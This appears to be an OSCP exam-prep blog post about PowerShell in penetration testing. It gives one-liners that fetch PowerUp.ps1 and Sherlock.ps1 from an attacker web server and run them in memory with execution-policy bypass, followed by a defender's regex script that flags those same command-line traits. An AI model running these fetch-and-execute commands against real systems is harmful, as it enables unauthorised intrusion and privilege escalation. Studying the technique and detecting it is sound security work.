OSCP/Exam prep

PowerShell for Penetration Testing - 2

우와해커 2020. 7. 15. 14:52

http://virgil-cj.blogspot.com/2018/02/escalation-time.html

These one-liners fetch the script from your web server and run it in memory on the victim machine (IEX evaluates the downloaded text directly, so the .ps1 is never written to disk).

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks"

c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks"

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/Sherlock.ps1') ; Find-AllVulns"

If the .ps1 file is already on the victim machine, import it as a module and run it like this:

c:\>powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"

c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

I always prefer the one-liners, clean and simple, but you might lose your shell after executing them.
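From the defender's side, both styles shown above (the IEX download cradle and the local Import-Module run) leave distinctive traits in process command lines or PowerShell script block logs. The following added example (not from the original post) triages constructed command lines, modelled on the ones above, for those traits; the sample lines, the indicator names and the 198.51.100.7 host are all assumptions made up for the example.

```python
import re

# Constructed sample process command lines (not real telemetry), modelled on the
# one-liners shown above plus one benign PowerShell invocation for contrast.
SAMPLE_COMMAND_LINES = [
    "powershell.exe \"IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks\"",
    "powershell.exe -ExecutionPolicy Bypass -noLogo -Command \"IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/powerup.ps1') ; Invoke-AllChecks\"",
    "powershell.exe -exec bypass -Command \"& {Import-Module .\\Sherlock.ps1; Find-AllVulns}\"",
    "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\Users | Measure-Object\"",
]

# Each indicator is one trait of the technique on this page. The cradle pattern
# fires whether IEX precedes the download call or is piped after it, and the
# bypass pattern accepts PowerShell's abbreviated parameter names (-ex, -exec, -ep).
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)(\biex\b|invoke-expression).*\.download(string|file)\("
        r"|\.download(string|file)\(.*(\biex\b|invoke-expression)"),
    "execution_policy_bypass": re.compile(r"(?i)-(ex\w*|ep)\s+bypass"),
    "local_module_import": re.compile(r"(?i)\bimport-module\s+\.\\[^\s;]+\.ps1"),
    "known_tool_function": re.compile(r"(?i)\b(invoke-allchecks|find-allvulns)\b"),
}


def indicators_for(command_line):
    """Return the names of all indicators that fire on one command line."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(command_line)]


def triage(command_lines):
    """Return (index, fired indicators) for every line with at least one hit;
    benign lines produce no entry at all."""
    results = []
    for index, line in enumerate(command_lines):
        hits = indicators_for(line)
        if hits:
            results.append((index, hits))
    return results


if __name__ == "__main__":
    for index, hits in triage(SAMPLE_COMMAND_LINES):
        print(f"line {index}: {', '.join(hits)}")
```

A single hit such as the bypass flag is common in legitimate administration; the combination of cradle, bypass and a known tool function name on one line is what merits an alert.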